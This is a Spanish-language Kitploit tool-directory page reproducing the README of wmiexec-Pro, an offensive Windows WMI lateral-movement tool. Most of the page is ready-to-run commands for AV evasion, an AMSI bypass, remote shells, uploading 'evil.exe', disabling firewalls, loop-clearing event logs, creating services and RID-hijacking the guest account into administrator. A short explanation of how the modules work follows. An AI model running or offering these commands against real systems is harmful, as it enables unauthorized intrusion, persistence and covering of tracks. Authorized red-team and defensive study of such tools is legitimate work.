Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wmiexec-Pro — New generation of wmiexec.py | Kitploit
Herramientas/GitHubGitHub/xiaolichan/wmiexec-pro
Privilege EscalationPersistence MechanismsLateral MovementInformation GatheringPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubxiaolichan/wmiexec-pro

wmiexec-Pro

New generation of wmiexec.py

Ver Repositorio
1.3k151hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wmiexec-Pro

Tabla de contenido

  1. Información
  2. Agradecimientos especiales
  3. Características
  4. Cómo empezar
    • Instalación
  5. Uso
  6. Capturas de pantalla
  7. ¿Cómo funciona?
  8. Aviso legal
  9. Referencias

Información

La nueva generación de wmiexec.py, con más funciones nuevas; todas las operaciones solo funcionan con el puerto 135 (no se necesita conexión SMB) para la evasión de AV en el movimiento lateral (Windows Defender, HuoRong, 360)

(volver arriba)

Agradecimientos especiales

@422926799

(volver arriba)

Características

  • Característica principal: Evasión de AV
  • Característica principal: No se necesita win32_process
  • Característica principal: Solo se necesita el puerto 135.
  • Nuevo módulo: Bypass de AMSI
  • Nuevo módulo: Transferencia de archivos
  • Nuevo módulo: Habilitar RDP de forma remota mediante el método de clase WMI
  • Nuevo módulo: Abuso del firewall de Windows
  • Nuevo módulo: Limpieza en bucle del registro de eventos
  • Nuevo módulo: Habilitar WinRM de forma remota sin tocar CMD
  • Nuevo módulo: Administrador de servicios
  • Nuevo módulo: RID-Hijack
  • Mejora: Obtener la salida de la ejecución de comandos de una nueva forma
  • Mejora: Ejecutar archivos vbs

(volver arriba)

Cómo empezar

Instalación

Solo se necesita la última versión de Impacket

  1. Clona el repositorio de Impacket
    root@kitploit:~
    git clone https://github.com/fortra/impacket
    
  2. Instala Impacket
    root@kitploit:~
    cd impacket && sudo pip3 install .
    
  3. Disfrútalo :)
    root@kitploit:~
    git clone https://github.com/XiaoliChan/wmiexec-Pro
    

(volver arriba)

Uso

root@kitploit:~
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:[email protected] enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles)
   
Services:
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json

Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)

RID Hijack:
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action activate (Activate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action deactivate (Deactivate user)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login enable (Enable blank password login)
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -blank-pass-login disable
   python3 wmiexec-pro.py administrator:[email protected] rid-hijack -user 500 -action backup (This will save user profile data as json file)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
   python3 wmiexec-pro.py [email protected] -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
   

(volver arriba)

Capturas de pantalla

  • Ayuda

  • exec-command

  • filetransfer

    • Subir archivo

    • Descargar archivo

(volver arriba)

¿Cómo funciona?

  • Módulo AMSI:

    • Técnica de Tal-Liberman de BlackHat Asia 2018.
  • Módulo exec-command:

    • Mejora del proyecto anterior: wmiexec-RegOut, obtiene la salida de la clase WMI en lugar del registro.
  • Módulo filetransfer:

    • Para subir: codifica el archivo de origen como cadenas base64 dentro del dropper llamado WriteFile.vbs y luego crea una nueva instancia del objeto ActiveScriptEventConsumer para ejecutar el dropper.
    • Para descargar: crea de forma remota una clase para almacenar datos y luego ejecuta el codificador LocalFileIntoClass.vbs para codificar el archivo y almacenar los datos en la clase recién creada.
  • Módulo rdp:

    • Para habilitar/deshabilitar: servicios RDP: controlar directamente el objeto TerminalServices.
    • Para habilitar/deshabilitar: Modo de administración restringida (Restricted Admin Mode): controlar la clave de registro DisableRestrictedAdmin mediante la clase StdRegProv.
  • Módulo winrm:

    • Para habilitar/deshabilitar: invocar el módulo de servicios.
    • Para las reglas del firewall: usar el módulo firewall.py para configurar el firewall de WinRM.
  • Módulo firewall:

    • Abusa de las clases , , .

(volver arriba)

Aviso legal

El espíritu de esta iniciativa de código abierto es ayudar a los investigadores de seguridad y a la comunidad a acelerar las actividades de investigación y educación relacionadas con la implementación de protocolos y stacks de red.

La información de este repositorio es para fines de investigación y educación, y no está destinada a ser utilizada en entornos de producción ni como parte de productos comerciales.

Si deseas utilizar este código o parte de él para tus propios fines, recomendamos aplicar un ciclo de vida de desarrollo de seguridad adecuado y prácticas de codificación seguras, así como generar y rastrear los respectivos indicadores de compromiso según tus necesidades.

(volver arriba)

Referencias

  • GhostPack/SharpWMI
  • impacket
  • WMIHACKER
  • Documentación de Microsoft WMI
  • Documentación de Microsoft VBScripts

(volver arriba)

Descargar herramienta
MSFT_NetProtocolPortFilter
MSFT_NetFirewallRule
MSFT_NetFirewallProfile
  • Módulo service:

    • Abusa de las clases Win32_Service.
  • Módulo eventlog:

    • Ejecuta el script VBS ClearEventlog.vbs sin eliminar event y consumer.
  • Módulo execute-vbs:

    • Extraído de wmipersist.py.
  • Método classMethodEx:

    • Para crear clases: ejecuta el script VBS CreateClass.vbs para crear una clase simple. (¿Por qué? No tengo idea de cómo usar el método PutClass en Impacket).
    • Para eliminar clases: llama al método DeleteClass para eliminar la clase.